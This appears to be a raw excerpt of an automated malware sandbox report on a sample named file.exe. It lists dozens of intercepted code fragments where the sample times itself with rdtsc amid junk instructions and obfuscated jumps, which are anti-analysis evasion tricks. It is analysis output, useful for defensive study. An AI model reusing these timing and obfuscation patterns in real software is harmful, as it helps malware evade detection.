Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E1A0DB second address: E1A135 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FDE70D000C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 jnl 00007FDE70D000CEh 0x00000016 mov eax, dword ptr [eax] 0x00000018 jmp 00007FDE70D000D6h 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 push eax 0x00000022 push edx 0x00000023 je 00007FDE70D000DEh 0x00000029 jmp 00007FDE70D000D8h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E1A1A8 second address: E1A1CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE71263CF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jbe 00007FDE71263CFFh 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E1A1CF second address: E1A21A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDE70D000D1h 0x00000009 popad 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jmp 00007FDE70D000D0h 0x00000013 mov eax, dword ptr [eax] 0x00000015 push edi 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 pop edx 0x0000001a pop edi 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f push ebx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FDE70D000D2h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E1A21A second address: E1A265 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE71263CF0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a pop eax 0x0000000b mov edi, 5D8F740Ch 0x00000010 push 00000003h 0x00000012 push 00000000h 0x00000014 or ecx, dword ptr [ebp+122D2C47h] 0x0000001a push 00000003h 0x0000001c mov dword ptr [ebp+122D2AF9h], edx 0x00000022 call 00007FDE71263CE9h 0x00000027 jnp 00007FDE71263CECh 0x0000002d push eax 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 pushad 0x00000032 popad 0x00000033 push edx 0x00000034 pop edx 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E1A352 second address: E1A356 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E1A356 second address: E1A366 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E1A366 second address: E1A38C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 nop 0x00000007 mov cl, 4Ah 0x00000009 push 00000000h 0x0000000b call 00007FDE70D000C9h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FDE70D000D0h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E1A38C second address: E1A3FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE71263CEEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b jmp 00007FDE71263CF1h 0x00000010 pop esi 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 jmp 00007FDE71263CF3h 0x0000001a mov eax, dword ptr [eax] 0x0000001c jmp 00007FDE71263CF0h 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 pushad 0x00000026 jmp 00007FDE71263CF5h 0x0000002b push eax 0x0000002c push edx 0x0000002d je 00007FDE71263CE6h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E1A533 second address: E1A537 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E1A537 second address: E1A603 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007FDE71263CFFh 0x0000000c popad 0x0000000d mov dword ptr [esp], eax 0x00000010 call 00007FDE71263CEAh 0x00000015 push ebx 0x00000016 movzx edi, bx 0x00000019 pop ecx 0x0000001a pop esi 0x0000001b push 00000000h 0x0000001d or ecx, dword ptr [ebp+122D1C08h] 0x00000023 push 31B3FA30h 0x00000028 jmp 00007FDE71263CEBh 0x0000002d xor dword ptr [esp], 31B3FAB0h 0x00000034 xor dword ptr [ebp+122D1D20h], eax 0x0000003a pushad 0x0000003b push edi 0x0000003c jmp 00007FDE71263CF5h 0x00000041 pop esi 0x00000042 jmp 00007FDE71263CF3h 0x00000047 popad 0x00000048 push 00000003h 0x0000004a pushad 0x0000004b pushad 0x0000004c mov dword ptr [ebp+122D2195h], edi 0x00000052 mov eax, dword ptr [ebp+122D2C67h] 0x00000058 popad 0x00000059 adc si, 614Eh 0x0000005e popad 0x0000005f push 00000000h 0x00000061 mov dword ptr [ebp+122D1D43h], edx 0x00000067 push 00000003h 0x00000069 mov edi, dword ptr [ebp+122D2D53h] 0x0000006f cld 0x00000070 call 00007FDE71263CE9h 0x00000075 push eax 0x00000076 push edx 0x00000077 jmp 00007FDE71263CEFh 0x0000007c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E1A603 second address: E1A626 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FDE70D000C8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007FDE70D000CDh 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E1A626 second address: E1A62A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E1A62A second address: E1A641 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE70D000CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E1A641 second address: E1A669 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007FDE71263CF1h 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jnc 00007FDE71263CE8h 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E1A669 second address: E1A6A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE70D000CAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a lea ebx, dword ptr [ebp+1245A013h] 0x00000010 and esi, 50E2A92Eh 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FDE70D000D9h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E0C742 second address: E0C748 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E37E4F second address: E37E53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E37E53 second address: E37E5C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E37E5C second address: E37E63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E37FBD second address: E37FC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E37FC1 second address: E37FFA instructions: 0x00000000 rdtsc 0x00000002 js 00007FDE70D000C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b pushad 0x0000000c popad 0x0000000d pop esi 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 ja 00007FDE70D000C6h 0x00000017 pop edx 0x00000018 popad 0x00000019 pushad 0x0000001a pushad 0x0000001b jnl 00007FDE70D000C6h 0x00000021 jbe 00007FDE70D000C6h 0x00000027 pushad 0x00000028 popad 0x00000029 popad 0x0000002a ja 00007FDE70D000CCh 0x00000030 push edi 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E384CA second address: E384D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E384D0 second address: E384D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E384D4 second address: E384DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E384DF second address: E384ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 je 00007FDE70D000C6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E384ED second address: E384F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E384F3 second address: E3850C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007FDE70D000C6h 0x0000000d jmp 00007FDE70D000CCh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E3878E second address: E38793 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E38793 second address: E3879D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FDE70D000CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E38A14 second address: E38A1E instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FDE71263CE6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E38B9C second address: E38BB7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007FDE70D000D5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E38BB7 second address: E38BBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E394A0 second address: E394B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE70D000CDh 0x00000007 je 00007FDE70D000CCh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E395F5 second address: E395FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E3E0C5 second address: E3E0E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FDE70D000CCh 0x00000008 jo 00007FDE70D000C6h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E3E0E7 second address: E3E0EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E3E0EB second address: E3E0F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E3E0F1 second address: E3E0F6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E3E0F6 second address: E3E108 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 jng 00007FDE70D000D4h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E3E108 second address: E3E120 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FDE71263CE6h 0x0000000a popad 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push edi 0x00000010 push eax 0x00000011 push edx 0x00000012 jnp 00007FDE71263CE6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E40F69 second address: E40F7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FDE70D000CCh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E40F7F second address: E40F83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E45625 second address: E4563B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE70D000D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E4563B second address: E45647 instructions: 0x00000000 rdtsc 0x00000002 js 00007FDE71263CEEh 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DF8723 second address: DF8727 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DF8727 second address: DF874F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FDE71263CEDh 0x0000000c jmp 00007FDE71263CF2h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E44BAE second address: E44BC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDE70D000CFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E44BC1 second address: E44BC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E44BC5 second address: E44BF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FDE70D000C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FDE70D000CBh 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 jmp 00007FDE70D000D7h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E44BF9 second address: E44C03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push edx 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E44C03 second address: E44C08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E44C08 second address: E44C0D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E44D54 second address: E44D58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E454D2 second address: E454D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E454D8 second address: E454E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 jng 00007FDE70D000C6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E454E7 second address: E454ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E48279 second address: E48296 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE70D000D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007FDE70D000CCh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E4861B second address: E48636 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FDE71263CF1h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E48B3A second address: E48B42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E48BB8 second address: E48BBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E48C81 second address: E48C91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 jc 00007FDE70D000C6h 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E48F79 second address: E48F7F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E490B1 second address: E490EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE70D000D6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e jmp 00007FDE70D000D9h 0x00000013 pop edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E490EA second address: E490F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FDE71263CE6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E495C5 second address: E495FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jp 00007FDE70D000C6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 jmp 00007FDE70D000CAh 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a cld 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FDE70D000D6h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E49ED6 second address: E49F6B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edi 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007FDE71263CE8h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 0000001Dh 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 sub dword ptr [ebp+12457D2Ch], ebx 0x0000002d mov dword ptr [ebp+122D20BAh], ecx 0x00000033 push 00000000h 0x00000035 mov esi, edx 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push ebx 0x0000003c call 00007FDE71263CE8h 0x00000041 pop ebx 0x00000042 mov dword ptr [esp+04h], ebx 0x00000046 add dword ptr [esp+04h], 00000017h 0x0000004e inc ebx 0x0000004f push ebx 0x00000050 ret 0x00000051 pop ebx 0x00000052 ret 0x00000053 mov dword ptr [ebp+122D1CD4h], ecx 0x00000059 xchg eax, ebx 0x0000005a jmp 00007FDE71263CF2h 0x0000005f push eax 0x00000060 pushad 0x00000061 pushad 0x00000062 jmp 00007FDE71263CF4h 0x00000067 push eax 0x00000068 push edx 0x00000069 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E4B0C0 second address: E4B0C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E4A763 second address: E4A76C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E4A76C second address: E4A781 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 je 00007FDE70D000D4h 0x0000000d push eax 0x0000000e push edx 0x0000000f jnl 00007FDE70D000C6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E4B8F2 second address: E4B915 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FDE71263CECh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007FDE71263CEEh 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E4C5BB second address: E4C5C5 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FDE70D000C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E4C5C5 second address: E4C5CA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E4D0C7 second address: E4D0CC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E4CE2F second address: E4CE33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E4CE33 second address: E4CE37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E4CE37 second address: E4CE3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E4DC32 second address: E4DC44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jbe 00007FDE70D000C6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E4DC44 second address: E4DC49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E4DC49 second address: E4DC7B instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FDE70D000C8h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d sub dword ptr [ebp+1245AF8Dh], edx 0x00000013 push 00000000h 0x00000015 movzx edi, si 0x00000018 push 00000000h 0x0000001a mov dword ptr [ebp+1245DBCDh], esi 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FDE70D000CFh 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E4DC7B second address: E4DC81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E4DC81 second address: E4DC85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E50DF2 second address: E50E04 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE71263CEEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E50E04 second address: E50E16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDE70D000CEh 0x00000009 rdtsc
